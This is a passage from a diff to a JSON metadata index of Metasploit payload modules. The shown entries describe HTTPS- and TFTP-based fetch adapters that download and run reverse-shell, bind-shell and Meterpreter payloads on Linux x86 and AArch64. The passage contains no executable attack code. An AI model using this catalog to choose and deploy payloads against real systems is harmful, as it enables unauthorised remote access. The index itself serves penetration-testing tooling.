false + }, + "payload_cmd/linux/https/x86/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x86/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/metsvc_bind_tcp": { + "name": "HTTPS Fetch, Linux Meterpreter Service, Bind TCP", + "fullname": "payload/cmd/linux/https/x86/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/metsvc_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/metsvc_reverse_tcp": { + "name": "HTTPS Fetch, Linux Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/x86/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/metsvc_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/read_file": { + "name": "HTTPS Fetch, Linux Read File", + "fullname": "payload/cmd/linux/https/x86/read_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hal" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + 
"ref_name": "cmd/linux/https/x86/read_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/read_file", + "staged": false + }, + "payload_cmd/linux/https/x86/shell/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + 
"description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/https/x86/shell/bind_nonx_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/x86/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/bind_nonx_tcp", + "staged": true, + 
"stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/https/x86/shell/bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/https/x86/shell/bind_tcp_uuid": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/https/x86/shell/find_tag": { + "name": "HTTPS Fetch, Linux Command Shell, Find Tag Stager", + "fullname": "payload/cmd/linux/https/x86/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/find_tag", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/https/x86/shell/reverse_ipv6_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + 
"author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/https/x86/shell/reverse_nonx_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + 
"adapted_refname": "linux/x86/shell/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/https/x86/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/https/x86/shell/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/https/x86/shell_bind_ipv6_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/https/x86/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection over IPv6 and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + 
"Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_bind_tcp_random_port": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/https/x86/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Geyslan G. 
Bem ", + "Aleh Boitsau " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", + "EDB-41631" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_find_port": { + "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/https/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", 
+ "adapted_refname": "linux/x86/shell_find_port", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_find_tag": { + "name": "HTTPS Fetch, Linux Command Shell, Find Tag Inline", + "fullname": "payload/cmd/linux/https/x86/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_find_tag", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle ", + "joev " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_reverse_tcp", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_reverse_tcp_ipv6": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/https/x86/shell_reverse_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Matteo Malvica " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_reverse_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", + "staged": false + }, + "payload_cmd/linux/tftp/aarch64/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack " + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/meterpreter", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + 
"timwr" + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/aarch64/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": 
"payload/cmd/linux/tftp/aarch64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/shell", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/tftp/aarch64/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
